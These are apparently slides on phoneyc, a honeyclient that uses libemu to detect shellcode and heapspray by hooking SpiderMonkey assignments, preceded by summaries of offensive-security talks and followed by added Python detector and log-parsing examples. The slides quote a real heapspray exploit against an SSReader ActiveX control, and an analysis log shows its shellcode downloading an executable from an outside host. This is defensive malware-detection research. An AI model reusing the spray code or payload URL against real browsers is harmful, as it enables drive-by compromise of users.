The document discusses using the libemu library to detect shellcode and heapspray in the Python honeyclient phoneyc. Libemu allows for shellcode detection using x86 instruction emulation and GetPC heuristics. The document outlines integrating libemu into phoneyc to defend browsers against drive-by downloads and heap-spraying code injection attacks in web-based malware.
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF (Michele Orru)
This document discusses using the Browser Exploitation Framework (BeEF) and inter-protocol exploitation techniques to gain control of victim browsers. It begins with an overview of traditional browser attack vectors and their limitations. It then introduces BeEF and how it can be used to hook victim browsers through XSS and control them remotely with JavaScript. The document proposes revitalizing inter-protocol exploitation techniques to bypass cross-domain restrictions and allow executing commands on the victim's machine. It presents the design of a new BeEF Bind shellcode that sets up a web server to accept commands and control a process like cmd.exe on the victim internally without needing an outbound connection.
Exploit Research and Development Megaprimer: Unicode Based Exploit Development (Ajin Abraham)
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
This document provides an overview of shellcode mastering techniques. It discusses the basics of shellcode including features, types, and development tasks. It covers basic shellcode techniques like call/ret algorithms and delta offset approaches. Optimization techniques are analyzed like instruction format optimizations, register value reusing, and avoiding the stack. An example analysis is given of the evolution of smaller shellcodes over time in a shellcode size competition. Hands-on labs are described to practice skills like addressing variables, using strings, and finding Windows API entry points. Required tools are listed for the labs including debuggers and assemblers.
Hacking school computers for fun, profit and better grades, short (Vincent Ohprecio)
The document discusses various topics related to hacking including motivations, methodologies, and tools. It describes how hackers conduct reconnaissance on targets, develop exploits, execute exploits, and maintain access. Specific hacking methods like fuzzing, malware kits, and shellcode are explained. Potential targets mentioned include students, faculty computers, wireless networks, and websites. The document also provides biographical information about the author and recommends books and resources for hacking.
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013 (midnite_runr)
Patching Windows Executables with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
The document discusses analyzing malicious PDF files. It describes decompressing PDFs using PDFTK to extract JavaScript. JavaScript is analyzed using a JavaScript emulator like SpiderMonkey to deobfuscate code. Any shellcode is reformed from Unicode and analyzed using Sctest for its behavior. The document provides examples of analyzing sample PDFs, extracting JavaScript, decompressing streams, and inspecting shellcode payloads. Analysis steps and tools used are explained to help understand how malicious PDF files work and discover embedded exploits.
Exploit Research and Development Megaprimer: Win32 Egghunter (Ajin Abraham)
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
One Shellcode to Rule Them All: Cross-Platform Exploitation (Quinn Wilton)
As the internet of things becomes less a buzzword, and more a reality, we're noticing that it's growing increasingly common to see embedded software which runs across different architectures, whether that's the same router firmware running across different models, or the operating system for a smart TV being used by different manufacturers. In a world where even your toaster might have internet access, we suspect that the ability to write cross-platform shellcode is going to transition from being a merely neat trick to a viable tool for attackers.
Writing cross-platform shellcode is tough, but there are a few techniques you can use to simplify the problem. We discuss one such method, which we used to great success during the DEFCON CTF qualifiers this year.
Presented by Tinfoil Security founder Michael Borohovski and engineer Shane Wilton at Secuinside 2014, in Seoul.
https://www.tinfoilsecurity.com/blog/cross-platform-exploitation
This is a presentation I put together and presented for my colleagues at IBM back in 2006. I started on the section featuring heap exploits and never finished it. I want to finish it someday.
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us... (Michele Orru)
Browser exploits are a primary attack vector to compromise a victim's internal network, but they have major restrictions including: limited current browser exploits; the huge price for 0-day browser exploits; and exploit complexity due to sandboxing. So, instead of exploiting the victim's browser, what if the victim's browser exploited internal systems for you?
The new "BeEF Bind Exploit Proxy" module does this! This BeEF (Browser Exploitation Framework) module will allow penetration testers to proxy exploits through a victim's web browser to compromise internal services. Not only this, but the new "BeEF Bind" shellcode also enables the communication channel to the attacker to pass back through the existing browser session.
This attack technique (Inter-protocol Exploitation) removes browser-based attacks from being dependent upon browser vulnerabilities. It increases the number of potential exploits to include many service vulnerabilities throughout the internal corporate network. This includes whatever service can be contacted via a browser request. This increases the success rate of client-side exploitation attempts by dramatically increasing the number of vulnerabilities accessible to the attacker.
So how does the new BeEF Bind Exploit Proxy work? BeEF is configured to use the BeEF Bind Exploit Proxy, and is set as the payload for XSS exploits or Phishing attacks. Once the victim visits the malicious site, their web browser becomes hooked and performs JavaScript port scanning across the internal corporate network looking for chosen open ports. Once a server has been identified, the BeEF server is notified and begins to send exploits through the hooked web browser to the service on the internal server. Each of these exploits is configured to use the new BeEF Bind shellcode.
Once an exploit has successfully triggered a vulnerability within the internal service, the BeEF Bind shellcode is executed. This shellcode is designed to set up a web listener that proxies commands through to a shell on the compromised server. This allows the attacker to send commands through the hooked web browser to the BeEF Bind payload. The command is executed on the compromised server and returned to the web browser in HTTP responses. The hooked web browser is then able to receive the command output and proxy it back to the attacker at the BeEF server.
Penetration testers can now inject steroids into their XSS exploits by replacing simple alert boxes with demonstrations of actual compromised internal machines. They can also now increase the scope and success rate of their Phishing attacks to compromise internal servers. This new approach also minimizes the likelihood of IDS/IPS detection, and does not require an additional socket open back to the attacker via the firewall.
This document discusses Cisco IOS shellcoding and reverse engineering. It covers topics like Cisco IOS shellcodes that are image-independent through disassembling or interrupt hijacking. It also discusses Tcl shellcodes and Cisco IOS reverse engineering challenges, including the lack of modularity and APIs. The document details subsystems, registries, processes, the command parser tree, debugging Cisco IOS, and magic numbers used in Cisco IOS.
This document discusses various low-level exploits, beginning with creating shellcode by extracting opcodes from a compiled C program. It then covers stack-based buffer overflows, including return-to-stack exploits and return-to-libc. Next it discusses heap overflows using the unlink technique, integer overflows, and format string vulnerabilities. The document provides code examples and explanations of the techniques.
Hat Secure Training
By Danang Heriyadi.
[SHARE] Courses Linux Exploit Research 2012
- Purpose of the Course
- Introducing Vulnerability Software
- Processor Registers
- Assembly Instructions
- Buffer Overflows
- Shellcode
- Exploit
- Stack & Heap
- Basic Buffer Overflow
- Basic Stack Overflows with Linux
- Smashing stack for fun and profit
- Basic shellcode development
- DTORS Exploitation
- Heap corruption and exploitation
Register:
http://hatsecure.com/exploit
This talk describes the current state of the Veil-Framework and the different tools included in it, such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage and Veil-Ordnance.
Slides for a college course at City College San Francisco. Based on "The Shellcoder's Handbook: Discovering and Exploiting Security Holes ", by Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte; ASIN: B004P5O38Q.
Instructor: Sam Bowne
Class website: https://samsclass.info/127/127_S17.shtml
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph... (Stephan Chenette)
This document summarizes a presentation on detecting web browser heap corruption attacks. The presentation focuses on research into detecting these attacks and an internal tool called "xmon" that is part of a larger system for detecting malicious web content. The document provides background on heap corruption vulnerabilities and exploits, and how techniques like heap spraying and heap feng shui have increased the reliability of such exploits. It then describes xmon's methods for generic detection of exploit techniques through actions like patching virtual function calls and hooking structured exception handlers.
EkoParty 2010: iPhone Rootkit? There's an App for that. (Eric Monti)
This document discusses a proof of concept iPhone rootkit developed by reverse engineering the JailbreakMe exploit and jailbreak tools. It describes patching the tools to remove security checks and pop-ups, and preparing a custom "wad.bin" filesystem containing backdoored system utilities and apps to enable remote access and control of an infected device without the user's knowledge. A demo is proposed using a Ruby Sinatra server to serve the exploit to a vanilla iOS device and install the rootkit via the existing JailbreakMe vulnerability. The rootkit aims to remain hidden using techniques like disguising process names and removing GUI indicators of running services.
Toorcon Seattle 2011 - Browser Exploit Packs (Aditya K Sood)
The document discusses browser exploit packs and related tactics. It provides an overview of the generic browser exploit pack framework, including how it fingerprints the victim environment, supports exploit delivery through JavaScript and DOM objects, and triggers exploits. It then covers specific tactics used in browser exploit packs, such as plugin detection and verification, string obfuscation, user agent fingerprinting, and drive-by downloads. The document concludes with a discussion of future work analyzing malware domains and hacking techniques.
Flash security past_present_future_final_en (Sunghun Kim)
The document discusses a vulnerability in the ActionScript Virtual Machine 2 (AVM2) bytecode verifier that was discovered in October 2012. By examining the open source Tamarin project code, which implements AVM2, the author found that a bounds check on local register parameters was incorrectly omitted from the bytecode verification of declocal and inclocal opcodes. This omission allowed arbitrary register values to be used, potentially leading to code execution. The vulnerability was introduced in November 2011 by moving the bounds check to within an #ifdef block that is never executed in the released Flash Player.
Dmitriy Evdokimov. Light and dark side of code instrumentation (Yury Chemerkin)
This document discusses code instrumentation techniques. It begins by introducing the speaker and defining instrumentation as adding extra code to a program or environment for monitoring or changing program behavior. It then covers various uses of instrumentation including debugging, testing, profiling, and security applications like malware analysis. The document categorizes instrumentation approaches as static, load-time, or dynamic depending on when the instrumentation is applied. It provides examples of instrumentation for different programming languages and environments like Java, .NET, and ActionScript.
This document provides an overview of zero-day vulnerabilities and techniques for discovering them, including source code auditing and fuzzing. It discusses identifying entry points, input validations, and vulnerable functions by analyzing source code. Fuzzing is introduced as providing invalid or unexpected data to test for crashes or failures. Common fuzzing methods and the fuzzing lifecycle are outlined. Specific tools for source code auditing like RIPS and fuzzing like JBroFuzz are also mentioned.
1. phoneyc with libemu
Shellcode and heapspray detection in phoneyc
Zhijie Chen, Honeynet Project Chinese Chapter
Honeynet Project on Google Summer of Code, 2009
JoYAN
2. Contents
1 Introduction to phoneyc
2 A Typical Web-Based Malware
3 Shellcode detection using Libemu
4 Tracing Mozilla Spidermonkey
  Basic Principles of Spidermonkey
5 Shellcode Detection in phoneyc
  Basic Idea
  Details
  Related Source files
  Implementation
6 Heapspray Detection
7 Current Results
4. Introduction to phoneyc
http://code.google.com/p/phoneyc/
A python honeyclient
Originally written by Jose Nazario.
To detect Web-based Malware
6. A Typical Heapspray Mal-javascript I
<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+
...(shellcode)
"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672
%u7265%u652e%u6578%u0000");
</script>
<SCRIPT language="javascript">
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;

7. A Typical Heapspray Mal-javascript II
memory = new Array();
for (x=0; x<100; x++) memory[x] = block +shellcode;
var buffer = '';
while (buffer.length < 1024) buffer+="\x05";
var ok="1111";
target.Register(ok,buffer);
</script>
</body>
8. Heap Status After Heapspray
| More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |
9. Detecting Shellcode/Heapspray
SC/HS Detecting Tool: How To Detect It?
11. Introduction to libemu
From its official site:
libemu is a small library written in c offering basic x86 emulation and shellcode detection using GetPC heuristics. Using libemu one can:
- detect shellcodes
- execute the shellcodes
- profile shellcode behaviour
Using libemu to detect shellcode and heapspray in web-based malware: "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks"
12. Detecting x86 Instructions

SC/HS Detecting Time: When To Detect It?
14. Introduction to spidermonkey

What is SpiderMonkey?

SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
15. Basic Principles of Spidermonkey

- All the javascript sources are compiled into js bytecodes.
- An interpreter executes the bytecodes; each bytecode performs one simple action.
- All the javascript variables are stored as jsval.
- Some of the values are stored as an "atom", such as strings.
17. Basic Idea

Both the shellcode manipulation and the spraying of the fillblock involve assignments. So the shellcode can be detected immediately on its assignment if we are able to interrupt spidermonkey at the interpretation of the bytecodes related to an assignment and check their arguments and values for shellcode.
18. Details I

The following js code:

    function a(){b="c"; var a = 0;}

is compiled into bytecodes like:

    00000: bindname "b"
    00003: string "c"
    00006: setname "b"
    00009: pop
    00010: zero
    00011: setvar 0
    00014: pop
    00015: stop

So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcodes won't get past unnoticed!
19. Details

To do so, we need to:
- Step trace the spidermonkey runtime.
- Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) of all kinds of assignments. Unfortunately different kinds of assignment compile to different bytecodes.
- But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).
20. Related Source files to be used later

- jsapi.h: Basic APIs for javascript execution.
- jsdbgapi.h: Basic APIs for debugging spidermonkey.
- jsopcode.tbl: All the js opcodes (bytecodes).
- jsinterp.c: You can find how each bytecode is interpreted here.
21. Implementation

- Register a trace handler into spidermonkey using JS_SetInterrupt. This handler will be called at each step of the bytecode execution.
- In the handler:
    - Use JS_GetTrapOpcode to get the current opcode (bytecode).
    - Use JS_FrameIterator to get the current runtime stack.
    - Check the rvalue of the set* bytecodes on the top of the stack with libemu.
    - Dump the shellcodes and alert.
    - Continue the execution.
- Provide this traced js virtual machine as a python module named honeyjs, so other parts of phoneyc can use this module just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
23. Basic Idea

Heapspray:
- A myriad of NOP-like x86 instructions
- Accumulating through a loop of assignments
- Shellcode at the end of each sled
24. Basic Idea

Heapspray:
- A myriad of NOP-like x86 instructions
- Accumulating through a loop of assignments
- Shellcode at the end of each sled

Detection:
- Now: a variable counter to record the mal-assignments (assignments containing shellcode in the r-value).
- In the future: entropy? the Nozzle way?
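The hook of slides 18-21 and the counter of slide 24, modelled in Python as an added example; this is not honeyjs's or phoneyc's own code, which is C against the SpiderMonkey API. Bytecode events are fed to a handler that ignores every opcode without the JOF_SET bit, runs a shellcode test on the r-value that a set* opcode finds on top of the stack, and counts the mal-assignments; past a threshold the run is flagged as a heapspray. The numeric value of JOF_SET, the miniature opcode table, the threshold, and the static GetPC pattern scan standing in for libemu's emulation are all assumptions, and the trace is constructed to mirror the spray loop of slides 6-7 with JS strings modelled as bytes.

```python
"""Model of the assignment-time shellcode/heapspray check (added example, not phoneyc's code)."""
from dataclasses import dataclass, field
from typing import List, Tuple

# Opcode format flag modelled after the JOF_* bits in SpiderMonkey's jsopcode.h.
# Only JOF_SET matters here; its numeric value is an assumption for the model.
JOF_SET = 0x20

# Miniature jsopcode.tbl: opcode name -> format flags.  The set* opcodes named on
# the slides (plus setelem, which is how memory[x] = ... is stored) carry JOF_SET;
# the flag values are constructed for the example.
OPCODE_FORMAT = {
    "bindname": 0, "string": 0, "zero": 0, "pop": 0, "stop": 0,
    "setname": JOF_SET, "setvar": JOF_SET, "setprop": JOF_SET,
    "setarg": JOF_SET, "setelem": JOF_SET,
}

def is_assignment(opcode: str) -> bool:
    """Slide 19's trick: test the JOF_SET bit instead of enumerating every set* opcode."""
    return bool(OPCODE_FORMAT.get(opcode, 0) & JOF_SET)

# Stand-in for libemu's shellcode test.  libemu decides by emulating x86 from
# candidate offsets and watching for GetPC behaviour; this static scan only
# recognises the two textbook GetPC sequences, which is enough to drive the model.
GETPC_PATTERNS = (
    b"\xe8\x00\x00\x00\x00",  # call $+5: the pushed return address is the code's own EIP
    b"\xd9\x74\x24\xf4",      # fnstenv [esp-0xc]: stores the EIP of the last FPU instruction
)

def shellcode_offset(buf: bytes) -> int:
    """Offset of the first GetPC sequence in buf, or -1 when none is present."""
    hits = [h for h in (buf.find(p) for p in GETPC_PATTERNS) if h >= 0]
    return min(hits) if hits else -1

@dataclass
class HeapsprayDetector:
    """The interrupt handler of slide 21 plus the mal-assignment counter of slide 24."""
    threshold: int = 50                     # assumed; the slides give no fixed number
    mal_assignments: int = 0
    alerts: List[str] = field(default_factory=list)

    def on_bytecode(self, opcode: str, stack: List[object]) -> None:
        """Called once per interpreted bytecode, like the JS_SetInterrupt handler."""
        if not is_assignment(opcode) or not stack:
            return
        rvalue = stack[-1]                  # a set* opcode finds its r-value on top of the stack
        if not isinstance(rvalue, (bytes, bytearray)):
            return                          # numbers and objects cannot hold x86 code
        off = shellcode_offset(bytes(rvalue))
        if off < 0:
            return
        self.mal_assignments += 1           # slide 24: count assignments whose r-value is shellcode
        self.alerts.append(f"{opcode}: shellcode at offset {off}, size {len(rvalue)}")

    def heapspray_suspected(self) -> bool:
        return self.mal_assignments >= self.threshold

def build_sample_trace(sprays: int = 100) -> List[Tuple[str, List[object]]]:
    """Constructed bytecode trace in the shape of slides 6-7; JS strings are modelled as bytes."""
    stub = b"\xe8\x00\x00\x00\x00\x5b" + b"\x41" * 26    # call/pop GetPC stub plus filler, not real shellcode
    sled = b"\x90" * 0x400                               # short NOP sled standing in for the 0x40000-char block
    trace: List[Tuple[str, List[object]]] = [
        ("bindname", []), ("string", [b"c"]), ("setname", [b"c"]), ("pop", []),
        ("zero", []), ("setvar", [0]), ("pop", []),
    ]
    for _ in range(sprays):                              # for (x=0; x<100; x++) memory[x] = block + shellcode;
        trace += [("setelem", [sled + stub]), ("pop", [])]
    trace.append(("stop", []))
    return trace

def run_trace(trace, threshold: int = 50) -> HeapsprayDetector:
    """Drive the detector over a trace and hand back its state for inspection."""
    det = HeapsprayDetector(threshold=threshold)
    for opcode, stack in trace:
        det.on_bytecode(opcode, stack)
    return det

if __name__ == "__main__":
    d = run_trace(build_sample_trace())
    print(d.alerts[0])
    print(f"mal-assignments: {d.mal_assignments}, heapspray suspected: {d.heapspray_suspected()}")
```

The 100 spray iterations produce 100 mal-assignments, which is the same figure as the "HIT: 100" on the heapspray alert of slide 27; a run with only a handful of shellcode-carrying assignments stays below the threshold and is reported as shellcode only.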
26. A Run on ssreader_0day.html I

    joyan@Jdeb:~/code/phoneyc$ sh go.sh
    HONEYCLIENT MODULE TEST
    fetching http://172.31.25.227/phoneyc/ssreader_0day.html
    []
    ==> http://172.31.25.227/phoneyc/ssreader_0day.html
    JS EVAL
    Executing Javascript:
    DEBUG: !!!SC DETECTED at 141847268=141847572size:374
    DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    ...
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    SSReader Pdg2 Register method overflow
    [ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
    Runing shellcode... offset:248
    DEBUG: Begin analyzing ...
    DEBUG: download http://1v1.name/server.exe ->

27. A Run on ssreader_0day.html II

    c:\WINDOWS\system32\a.exe
    ...
    URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
    Done
    [ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
    [ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
    VBS EVAL IFRAMES []
    HREFS []
    FRAMES []
    IMAGES []
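A small triage helper for the go.sh output shown on slides 26 and 27, added here as an example and not part of phoneyc: it parses the "SC DETECTED", "[ALERT]" and "download" lines, collapses the repeated detections to one entry per address, and reports the facts an analyst checks first (how many distinct shellcode regions, the largest one, whether a heapspray alert fired and with how many hits, and any URL and drop path the emulated shellcode produced). The sample input is an abbreviated copy of the slides' own output; the line formats are taken from it, and the meaning of the "A=B" address pair in the debug lines is not stated on the slides, so the parser keeps the first number only.

```python
"""Triage helper for phoneyc go.sh output (added example, not part of phoneyc)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Sample input: lines copied from the ssreader_0day.html run on slides 26-27, abbreviated.
SAMPLE_LOG = """\
fetching http://172.31.25.227/phoneyc/ssreader_0day.html
Executing Javascript:
DEBUG: !!!SC DETECTED at 141847268=141847572size:374
DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
SSReader Pdg2 Register method overflow
[ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
Runing shellcode... offset:248
DEBUG: download http://1v1.name/server.exe -> c:\\WINDOWS\\system32\\a.exe
[ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
[ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
"""

# Line shapes as they appear on the slides; the second number of the A=B pair is ignored.
SC_RE = re.compile(r"DEBUG: !!!SC DETECTED at (\d+)=(\d+)size:(\d+)")
ALERT_RE = re.compile(r"\[ALERT\] (\d+): (\d+) -> (.+?) HIT: (\d+)")
DOWNLOAD_RE = re.compile(r"DEBUG: download (\S+) -> (\S+)")

@dataclass
class Alert:
    index: int
    address: int
    message: str
    hits: int

    @property
    def heapspray(self) -> bool:
        """phoneyc marks the spray with 'Potential heapspray sledge' in the message."""
        return "heapspray" in self.message.lower()

@dataclass
class RunSummary:
    shellcode_sizes: Dict[int, int] = field(default_factory=dict)   # first address -> size
    alerts: List[Alert] = field(default_factory=list)
    download_urls: List[str] = field(default_factory=list)
    dropped_paths: List[str] = field(default_factory=list)

def parse_run(log: str) -> RunSummary:
    """Walk the log once; repeated SC DETECTED lines collapse to one entry per address."""
    summary = RunSummary()
    for line in log.splitlines():
        m = SC_RE.match(line)
        if m:
            summary.shellcode_sizes.setdefault(int(m.group(1)), int(m.group(3)))
            continue
        m = ALERT_RE.match(line)
        if m:
            summary.alerts.append(Alert(int(m.group(1)), int(m.group(2)), m.group(3), int(m.group(4))))
            continue
        m = DOWNLOAD_RE.match(line)
        if m:
            summary.download_urls.append(m.group(1))
            summary.dropped_paths.append(m.group(2))
    return summary

def triage(log: str) -> dict:
    """Condense a run into the few facts an analyst checks first."""
    s = parse_run(log)
    return {
        "shellcode_regions": len(s.shellcode_sizes),
        "largest_shellcode": max(s.shellcode_sizes.values(), default=0),
        "heapspray": any(a.heapspray for a in s.alerts),
        "max_hits": max((a.hits for a in s.alerts), default=0),
        "download_urls": sorted(set(s.download_urls)),
        "dropped_paths": sorted(set(s.dropped_paths)),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample run this yields three distinct shellcode regions, the largest of 32728 bytes (the sprayed block with the shellcode at its end), one heapspray alert with 100 hits, and a single download URL with its drop path.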